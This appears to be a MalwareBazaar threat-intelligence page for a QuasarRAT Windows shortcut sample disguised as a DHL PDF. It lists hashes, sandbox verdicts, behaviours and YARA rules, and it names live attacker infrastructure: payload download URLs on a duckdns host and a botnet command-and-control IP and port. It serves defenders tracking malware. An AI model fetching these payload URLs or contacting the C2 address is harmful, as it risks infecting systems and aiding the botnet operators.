MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


QuasarRAT


Vendor detections: 10


Intelligence 10 IOCs YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85
SHA3-384 hash: 2137e9b427b64de97aad3d72e929aab2394b15ec9ea0c55e53d513267c157dc2e9349e9aaf317b44e5199638a583a2f6
SHA1 hash: ac127631e6b9ae0d116b6ada0c1257a7616ca5ea
MD5 hash: a19a7ae54479ea7636738f50f79b2daa
humanhash: finch-september-illinois-nine
File name:Delivery.pdf.lnk
Download: download sample
Signature QuasarRAT
Create hunting rule
File size:2'644 bytes
First seen:2023-10-12 12:47:16 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/octet-stream
ssdeep 24:8AGJ/ByUl1+f1fBiFnNht1Wdd79ds5FW1:8xifgFnT/WdJ9wW
TLSH T1D4513D141AE90710F3B75E76567A63208D77B846DE758F0D004C53C82B67A21E875F7B
Reporter abuse_ch
Tags:DHL lnk QuasarRAT RAT


Avatar
abuse_ch
zip->lnk->scp->hta->exe

Payload delivery domain:
dhlmissed.com

Payload delivery URLs:
https://frankmullers.duckdns.org/Dhlinvoice.pdf
https://frankmullers.duckdns.org/svchost.exe
https://frankmullers.duckdns.org/stub.exe

QuasarRAT botnet C2:
185.17.0.246:1419

Intelligence

File Origin
# of uploads :
1
# of downloads :
271
Origin country :
CH CH
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.27118.LnkHeur.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.OddLook.202207213.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.Guinnesses.20220719.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.Guinnesses.20221102.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
cmd evasive lolbin masquerade mshta
Link:
https://www.filescan.io/uploads/6527eb04853e4f06480a95fd/reports/98f3878b-1897-40fa-b29c-eb60bdc59478/overview
Verdict:
Malicious
Labled as:
LNK_ARG.09D9BA1E
Link:
https://www.hybrid-analysis.com/sample/f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85
Result
Verdict:
MALICIOUS
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.evad
Score:
96 / 100
Link:
https://www.joesandbox.com/analysis/1324677
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Uses the Telegram API (likely for C&C communication)
Very long command line found
Windows shortcut file (LNK) starts blacklisted processes
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1324677 Sample: Delivery.pdf.lnk Startdate: 12/10/2023 Architecture: WINDOWS Score: 96 35 hta4lyfeohyea.duckdns.org 2->35 37 frankmullers.duckdns.org 2->37 39 3 other IPs or domains 2->39 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 5 other signatures 2->51 11 cmd.exe 3 2 2->11         started        13 SkypeApp.exe 2 4 2->13         started        signatures3 process4 process5 15 mshta.exe 1 11->15         started        18 scp.exe 2 11->18         started        20 conhost.exe 1 11->20         started        signatures6 53 Windows shortcut file (LNK) starts blacklisted processes 15->53 55 Suspicious powershell command line found 15->55 57 Very long command line found 15->57 22 powershell.exe 17 18 15->22         started        25 ssh.exe 3 18->25         started        process7 dnsIp8 41 frankmullers.duckdns.org 193.42.33.145, 443, 49702, 49709 EENET-ASEE Germany 22->41 27 Acrobat.exe 67 22->27         started        29 conhost.exe 22->29         started        43 hta4lyfeohyea.duckdns.org 185.196.8.30, 22, 49701 SIMPLECARRER2IT Switzerland 25->43 process9 process10 31 AcroCEF.exe 70 27->31         started        process11 33 AcroCEF.exe 4 31->33         started       
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85/
Threat name:
Shortcut.Trojan.Hidden
Create hunting rule
Status:
Malicious
First seen:
2023-10-12 12:47:35 UTC
File Type:
Binary
AV detection:
9 of 37 (24.32%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=6fjdg3iwdqtzkjvxscljhsht72dxl5oag7huogsbxmrk4dclf6cq._file
Result
Malware family:
quasar
Create hunting rule
Score:
  10/10
Tags:
family:quasar botnet:cashing persistence spyware stealer trojan
Link:
https://tria.ge/reports/231012-p1rpkscf77/
Behaviour
Checks processor information in registry
Creates scheduled task(s)
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Enumerates physical storage devices
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks computer location settings
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Quasar RAT
Quasar payload
Malware Config
C2 Extraction:
185.17.0.246:1419
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.95
Link:
https://yomi.yoroi.company/submissions/f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Execution_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies execution artefacts in shortcut (LNK) files.
Rule name:EXE_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies executable artefacts in shortcut (LNK) files.
Rule name:Long_RelativePath_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.
Rule name:Script_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies scripting artefacts in shortcut (LNK) files.
Rule name:SUSP_LNK_CMD
Create hunting rule
Author:SECUINFRA Falcon Team
Description:Detects the reference to cmd.exe inside an lnk file, which is suspicious

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

QuasarRAT

zip 99308e45b1e121c7164e9057a3650924dbafab27dadacd4dd6f7a51bff55ec26

QuasarRAT

Shortcut (lnk) lnk f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85

(this sample)

QuasarRAT

HTML Application (hta) hta ae8c4f72c13b4103e0e977bbf2939a4b97860d1c279994d1b0bd27e00cbf8c2f

  
Link
https://threatfox.abuse.ch/ioc/1188051/
  
URLhaus
https://urlhaus.abuse.ch/host/frankmullers.duckdns.org/
  
Dropping
MD5 da5de2b74995076618fe814857073997
  
Dropping
SHA256 ae8c4f72c13b4103e0e977bbf2939a4b97860d1c279994d1b0bd27e00cbf8c2f
  
Dropped by
MD5 638d9a11204c3f7c2293d56c33d9282d
  
Dropped by
SHA256 99308e45b1e121c7164e9057a3650924dbafab27dadacd4dd6f7a51bff55ec26
  
Delivery method
Distributed via web download

Comments